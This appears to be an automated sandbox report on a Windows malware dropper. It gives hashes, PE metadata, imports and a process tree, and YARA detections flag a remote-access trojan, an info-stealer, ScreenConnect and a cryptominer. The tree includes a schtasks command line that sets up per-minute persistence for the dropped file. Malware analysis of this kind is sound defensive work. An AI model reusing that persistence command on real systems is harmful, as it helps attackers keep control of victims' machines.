Entropy (8bit):7.703603560955088
Encrypted:false
SSDEEP:24576:KmUPjztESBDhakdbtl7vq6bknwKTaA9Cpr2r:KmUPv+eldbtl7i6FKeFpy
MD5:18BBC3FB86E902AFB59C06811A5B01F4
SHA1:E9EA82EA8199BCB882B933A90707D7CA71F25899
SHA-256:FA480B199885433840ABE9D506CCF32FC75FC1DD771695CCE2DCB4F438A98D00
SHA-512:FC62B3CD4067F2CD11AF16B2F1130DC21135B5E23100CB5ACAF2C235B9C1DB128110E5BB4BF38FC438666649E4C865524B9ECF67695FBD080AA3D349D627BC5C
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):710144
Entropy (8bit):7.502820216844358
Encrypted:false
SSDEEP:12288:7vOG/HYZOL1n2mCbSPs9pQtKft96EuQFSaUdKGJY7NxO:7vOG/HYZOLrPsHQUuEpULWTO
MD5:631670BEA7DD01CB347C389294714438
SHA1:430E9FDBE7A8414E1FAB7DC61522C74708699361
SHA-256:AABD22FA9354E0C79521ECD0F8E870F908FF5AFD39E603B9820C9676176F626F
SHA-512:1C2BCF02C4AD10A57895974EA8589541EF868A5BBEC37EC4B7D9936F716C82C1CA958AC74538298C89A661B1639F1EEA12C7C1B13D4B0E7988AB8E51D9CE401D
Malicious:true
Reputation:unknown

Process:C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):665088
Entropy (8bit):6.5328361267936055
Encrypted:false
SSDEEP:6144:ZaHgJLlHUmYnuOZ1WuFv4cHSdzZU8QZgWhKrUrTAeT5CbdiAAxDCDb2+W:ZaHCXYnukUzZU8bWhjIKqFAxDCf2+
MD5:103C525AA49B81407E72A346BAA3EC19
SHA1:1AE74F6EF71B929472D28D064FC0C17D0FC54D1C
SHA-256:0593EEF89F1BDE96F5D469281DE905717E9B38A70D9B374C9C3193FCB740A22D
SHA-512:4FB74F42FCE676B37208B75CE378F4B91772F4C088A7C3C8D120F92C67D337DAD99E21F26DA5ADAFF0A2566158EC33DE35E8341415A1F6A729D5840CEE69EF8B
Malicious:true
Reputation:unknown

Process:C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1180160
Entropy (8bit):7.703603560955088
Encrypted:false
SSDEEP:24576:KmUPjztESBDhakdbtl7vq6bknwKTaA9Cpr2r:KmUPv+eldbtl7i6FKeFpy
MD5:18BBC3FB86E902AFB59C06811A5B01F4
SHA1:E9EA82EA8199BCB882B933A90707D7CA71F25899
SHA-256:FA480B199885433840ABE9D506CCF32FC75FC1DD771695CCE2DCB4F438A98D00
SHA-512:FC62B3CD4067F2CD11AF16B2F1130DC21135B5E23100CB5ACAF2C235B9C1DB128110E5BB4BF38FC438666649E4C865524B9ECF67695FBD080AA3D349D627BC5C
Malicious:true
Reputation:unknown

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.635102478988021
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:RPHbzz3JqY.exe
File size:331'776 bytes
MD5:848abdbd09c052799a0e0180b59f6fee
SHA1:2f73b04baf17c3a9f9d21f6f324d64306a10682c
SHA256:1aa0622a744ec4d28a561bac60ec5e907476587efbadfde546d2b145be4b8109
SHA512:eb3a87e787d151915da06f89132d6e5b9b7682a3a69761795180050f42c7fbe8831049ee96410e7b7de5e7c835ceff1e24e84321cccf8d6ed9ba5928bca58203
SSDEEP:6144:/DiElZeVJ9/+pPQHe5wocklXck9UBd4MvQhdaAadaH8CaTnlmIa+w4Iqr6KGus24:/DiETMgqkKBJm5+fnHYftcv7vQG6zIs
TLSH:65648D21BA41C031DAB114705B38BBF6992DEE344F6416F7A3D4097BAE702D2A735B63
                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............k...k...k.......k......hk.......k.......k.......k.......k.......k.......k...k..|k.......k.......k..Rich.k.................
                                                                                                                                                                                          Icon Hash:90cececece8e8eb0
                                                                                                                                                                                          Entrypoint:0x420eeb
                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                          Time Stamp:0x66A003BF [Tue Jul 23 19:25:51 2024 UTC]
                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                          OS Version Major:6
                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                          File Version Major:6
                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                          Import Hash:89d186e701948ed4026afa52bc6342f0
Instruction
call 00007EFD315B788Ch
jmp 00007EFD315B7279h
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007EFD315B741Bh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007EFD315B740Ch
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007EFD315B740Eh
add edx, 28h
cmp edx, esi
jne 00007EFD315B73ECh
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007EFD315B73FBh
push esi
call 00007EFD315B7B6Bh
test eax, eax
je 00007EFD315B7422h
mov eax, dword ptr fs:[00000018h]
mov esi, 004507C4h
mov edx, dword ptr [eax+04h]
jmp 00007EFD315B7406h
cmp edx, eax
je 00007EFD315B7412h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007EFD315B73F2h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
push ebp
mov ebp, esp
cmp dword ptr [ebp+08h], 00000000h
jne 00007EFD315B7409h
mov byte ptr [004507C8h], 00000001h
call 00007EFD315B6F58h
call 00007EFD315B9D3Eh
test al, al
jne 00007EFD315B7406h
xor al, al
pop ebp
ret
call 00007EFD315C2190h
test al, al
jne 00007EFD315B740Ch
push 00000000h
call 00007EFD315B9D45h
pop ecx
jmp 00007EFD315B73EBh
mov al, 01h
pop ebp
ret
push ebp
mov ebp, esp
cmp byte ptr [004507C9h], 00000000h
je 00007EFD315B7406h
mov al, 01h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4d7f4 | 0x8c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x52000 | 0x2a80 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x4b36c | 0x38 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x4b3a8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3e000 | 0x200 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3c66b | 0x3c800 | 4270448ae10fba783e5f096512347d79 | False | 0.495456159607438 | data | 6.648481461161736 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x3e000 | 0x1035c | 0x10400 | 688e27bdfc917ed709a959ab4c181f34 | False | 0.500811298076923 | OpenPGP Public Key | 5.5432050003934075 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x4f000 | 0x22c4 | 0x1400 | 163b751420a675ebe3796556975866b5 | False | 0.1919921875 | data | 3.372075073835572 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x52000 | 0x2a80 | 0x2c00 | 716b2ec73a0ea49608ead9bb91adb350 | False | 0.7561257102272727 | data | 6.548561404726861 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
KERNEL32.dll | ReadProcessMemory, WriteProcessMemory, GetModuleHandleA, GetProcAddress, GetEnvironmentVariableA, CreateDirectoryA, WaitForSingleObject, CreateMutexA, Sleep, GetModuleFileNameA, VirtualProtectEx, CreateProcessW, GetVersion, GetComputerNameA, WriteConsoleW, HeapSize, CreateFileW, GetProcessHeap, SetStdHandle, VirtualAllocEx, VirtualAlloc, SetThreadContext, GetThreadContext, CreateProcessA, ResumeThread, K32GetModuleFileNameExA, GetLastError, K32EnumProcesses, OpenProcess, TerminateProcess, GetCurrentProcessId, CopyFileA, CloseHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, HeapReAlloc, ReadConsoleW, SetFilePointerEx, GetFileSizeEx, ReadFile, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, GetFileType, GetCurrentThreadId, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringEx, CompareStringEx, GetCPInfo, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetModuleHandleW, GetStringTypeW, IsProcessorFeaturePresent, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, RaiseException, RtlUnwind, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, CreateThread, ExitThread, FreeLibraryAndExitThread, GetStdHandle, WriteFile, GetModuleFileNameW, GetCommandLineA, GetCommandLineW, HeapFree, HeapAlloc, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, SetEndOfFile
ADVAPI32.dll | RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegCloseKey, GetUserNameA
SHELL32.dll | ShellExecuteA
ole32.dll | CoInitializeEx, CoInitializeSecurity, CoSetProxyBlanket, CoCreateInstance, CoUninitialize
OLEAUT32.dll | SysAllocString, SysFreeString, VariantInit, VariantClear
WININET.dll | InternetReadFile, InternetOpenW, InternetOpenUrlA, InternetCloseHandle
Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.
Target ID: 0
Start time: 03:26:23
Start date: 24/07/2024
Path: C:\Users\user\Desktop\RPHbzz3JqY.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\RPHbzz3JqY.exe"
Imagebase: 0x5d0000
File size: 331'776 bytes
MD5 hash: 848ABDBD09C052799A0E0180B59F6FEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 03:26:23
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F
Imagebase: 0x350000
File size: 187'904 bytes
MD5 hash: 48C2FE20575769DE916F48EF0676A965
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 03:26:24
Start date: 24/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 03:26:24
Start date: 24/07/2024
Path: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe"
Imagebase: 0x530000
File size: 331'776 bytes
MD5 hash: 848ABDBD09C052799A0E0180B59F6FEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation: low
Has exited: true

Target ID: 4
Start time: 03:26:25
Start date: 24/07/2024
Path: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
Imagebase: 0x530000
File size: 331'776 bytes
MD5 hash: 848ABDBD09C052799A0E0180B59F6FEE
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 5
Start time: 03:26:25
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F
Imagebase: 0x350000
File size: 187'904 bytes
MD5 hash: 48C2FE20575769DE916F48EF0676A965
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 03:26:26
Start date: 24/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 03:26:32
Start date: 24/07/2024
Path: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe"
Imagebase: 0x530000
File size: 331'776 bytes
MD5 hash: 848ABDBD09C052799A0E0180B59F6FEE
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 8
Start time: 03:26:33
Start date: 24/07/2024
Path: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe
Wow64 process (32bit): false
Commandline: "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe"
Imagebase: 0xf20000
File size: 5'649'720 bytes
MD5 hash: E9DD0FC8F690BC7CBE71A51CF6C79F31
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 9
Start time: 03:26:35
Start date: 24/07/2024
Path: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe
Wow64 process (32bit): false
Commandline: "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe"
Imagebase: 0x7ff7b6560000
File size: 1'180'160 bytes
MD5 hash: 18BBC3FB86E902AFB59C06811A5B01F4
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000009.00000003.2181775167.00000234D5AAE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:
• Detection: 83%, ReversingLabs
• Detection: 74%, Virustotal
Reputation: low
Has exited: false

Target ID: 10
Start time: 03:26:37
Start date: 24/07/2024
Path: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe
Wow64 process (32bit): true
Commandline: "C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe"
Imagebase: 0xce0000
File size: 697'856 bytes
MD5 hash: 4F5771AA008FB55801A3F9FBA7130F69
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmp, Author: Joe Security
• Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmp, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 83%, ReversingLabs
• Detection: 76%, Virustotal
Reputation: low
Has exited: true

Target ID: 11
Start time: 03:26:37
Start date: 24/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 03:26:38
Start date: 24/07/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase: 0xb40000
File size: 262'432 bytes
MD5 hash: 8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.1840252168.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited: true

Target ID: 14
Start time: 03:26:41
Start date: 24/07/2024
Path: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe"
Imagebase: 0x530000
File size: 331'776 bytes
MD5 hash: 848ABDBD09C052799A0E0180B59F6FEE
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 18
Start time: 03:26:46
Start date: 24/07/2024
Path: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe
Wow64 process (32bit): false
Commandline: "C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe"
Imagebase: 0x7ff72bec0000
File size: 5'649'720 bytes
MD5 hash: E9DD0FC8F690BC7CBE71A51CF6C79F31
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe, Author: Joe Security
Has exited: true

Target ID: 19
Start time: 03:26:53
Start date: 24/07/2024
Path: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe
Wow64 process (32bit): false
Commandline: "C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe"
Imagebase: 0x240000
File size: 5'649'720 bytes
MD5 hash: E9DD0FC8F690BC7CBE71A51CF6C79F31
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, Author: Joe Security
Has exited: true

Target ID: 20
Start time: 03:26:59
Start date: 24/07/2024
Path: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe
Wow64 process (32bit): false
Commandline: "C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe"
Imagebase: 0x2e0000
File size: 5'649'720 bytes
MD5 hash: E9DD0FC8F690BC7CBE71A51CF6C79F31
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe, Author: Joe Security
Has exited: true

Target ID: 21
Start time: 03:27:06
Start date: 24/07/2024
Path: C:\ProgramData\3HvoFOAmEaJswFCHOzyfyz5b.exe
Wow64 process (32bit): false
Commandline: "C:\ProgramData\3HvoFOAmEaJswFCHOzyfyz5b.exe"
Imagebase: 0xeb0000
File size: 5'649'720 bytes
MD5 hash: E9DD0FC8F690BC7CBE71A51CF6C79F31
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\3HvoFOAmEaJswFCHOzyfyz5b.exe, Author: Joe Security
Has exited: true

Target ID: 22
Start time: 03:27:13
Start date: 24/07/2024
Path: C:\ProgramData\6KZmcK8r6beUzmRf6Ci6nx8d.exe
Wow64 process (32bit): false
Commandline: "C:\ProgramData\6KZmcK8r6beUzmRf6Ci6nx8d.exe"
Imagebase: 0x910000
File size: 5'649'720 bytes
MD5 hash: E9DD0FC8F690BC7CBE71A51CF6C79F31
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\6KZmcK8r6beUzmRf6Ci6nx8d.exe, Author: Joe Security
Has exited: true

Target ID: 23
Start time: 03:27:19
Start date: 24/07/2024
Path: C:\ProgramData\yDd3OJXsNQptgFrYILoygXLs.exe
Wow64 process (32bit): false
Commandline: "C:\ProgramData\yDd3OJXsNQptgFrYILoygXLs.exe"
Imagebase: 0xef0000
File size: 5'649'720 bytes
MD5 hash: E9DD0FC8F690BC7CBE71A51CF6C79F31
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\yDd3OJXsNQptgFrYILoygXLs.exe, Author: Joe Security
Has exited: true

Target ID: 24
Start time: 03:27:24
Start date: 24/07/2024
Path: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe"
Imagebase: 0x7ff6712e0000
File size: 1'180'160 bytes
MD5 hash: 18BBC3FB86E902AFB59C06811A5B01F4
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
Has exited: true

Target ID: 25
Start time: 03:27:26
Start date: 24/07/2024
Path: C:\ProgramData\xpTljBOh8s4KWiGtXsL1c00g.exe
Wow64 process (32bit): false
Commandline: "C:\ProgramData\xpTljBOh8s4KWiGtXsL1c00g.exe"
Imagebase: 0x8d0000
File size: 5'649'720 bytes
MD5 hash: E9DD0FC8F690BC7CBE71A51CF6C79F31
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\xpTljBOh8s4KWiGtXsL1c00g.exe, Author: Joe Security
Has exited: true

Target ID: 26
Start time: 03:27:28
Start date: 24/07/2024
Path: C:\Users\user\AppData\Local\Temp\gtxkvh.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\gtxkvh.exe"
Imagebase: 0xed0000
File size: 710'144 bytes
MD5 hash: 631670BEA7DD01CB347C389294714438
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 03:27:32
Start date: 24/07/2024
Path: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe"
Imagebase: 0x7ff6712e0000
File size: 1'180'160 bytes
MD5 hash: 18BBC3FB86E902AFB59C06811A5B01F4
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2780772219.00000159F38CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000001B.00000003.2794263235.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2783975569.00000159F3470000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2780772219.00000159F38FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2762360259.00000159F3465000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2770549430.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2761279906.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2759055860.00000159F38C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2778870088.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2769879693.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2801216518.00000159F3492000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2760278744.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2767124522.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2759580916.00000159F3896000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2779479672.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2783103519.00000159F360F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2787747249.00000159F349A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
